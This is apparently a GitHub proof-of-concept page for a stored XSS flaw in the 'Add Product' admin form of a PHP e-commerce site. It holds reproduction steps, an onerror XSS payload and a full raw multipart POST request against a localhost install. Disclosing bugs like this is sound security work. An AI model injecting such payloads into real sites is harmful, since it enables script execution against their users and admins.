Skip to content

CP04042K/Full-Ecommece-Website-Add_Product-Stored_XSS-POC

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 
 
 

Full-Ecommece-Website-Add_Product-Stored_XSS-POC

  • Note => Login to admin
  • Description => Stored_XSS at Product Title

Step to Reproduct

  • Login to admin -> Add Product -> input payload <img/src/onerror=prompt(10)> at Product Title -> Product Title

Exploit

image

  • Input payload at Product Title -> clicked Product Title -> The XSS will trigger image image

Vulnerable Code

image image

  • When inserting into the database, the input is not filtered out characters

POC

  • Injection Point
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product_title"

<image/src/onerror=prompt(8)>
  • Request
POST /Full-Ecommece-Website/Codes/public/admin/index.php?add_product HTTP/1.1
Host: localhost:8080
Content-Length: 1354971
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXtBAIsNDayF64Ebh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/Full-Ecommece-Website/Codes/public/admin/index.php?add_product
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=oam3rcbi14nilh2pp3s21upev5; twk_uuid_5c2396fb7a79fc1bddf24b28={"uuid":"1.AGDzvqvmbboNUBtyBA0XLKxrviwKWw7HVKOjPqv5aIOJHjOnigPvpa5cn7QPGv6D5QwLM7ZIIBSpua1NrhQBpEeAdolcmuMk3JJtap3Nu2WjBL31HFdBqMF9VFcu8Olw","version":3,"domain":null,"ts":1647022863776}; TawkConnectionTime=0
Connection: close

------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product_title"

<image/src/onerror=prompt(8)>
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product_description"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product_price"

10000
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="short_desc"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="publish"

Publish
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product_category_id"

12
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product_quantity"

1
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="file"; filename="car.png"
Content-Type: image/png

PNG

VIDEO POC https://drive.google.com/file/d/155K4qLwGI8kwctd5FijU9gzonSA2rMFz/view?usp=sharing

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published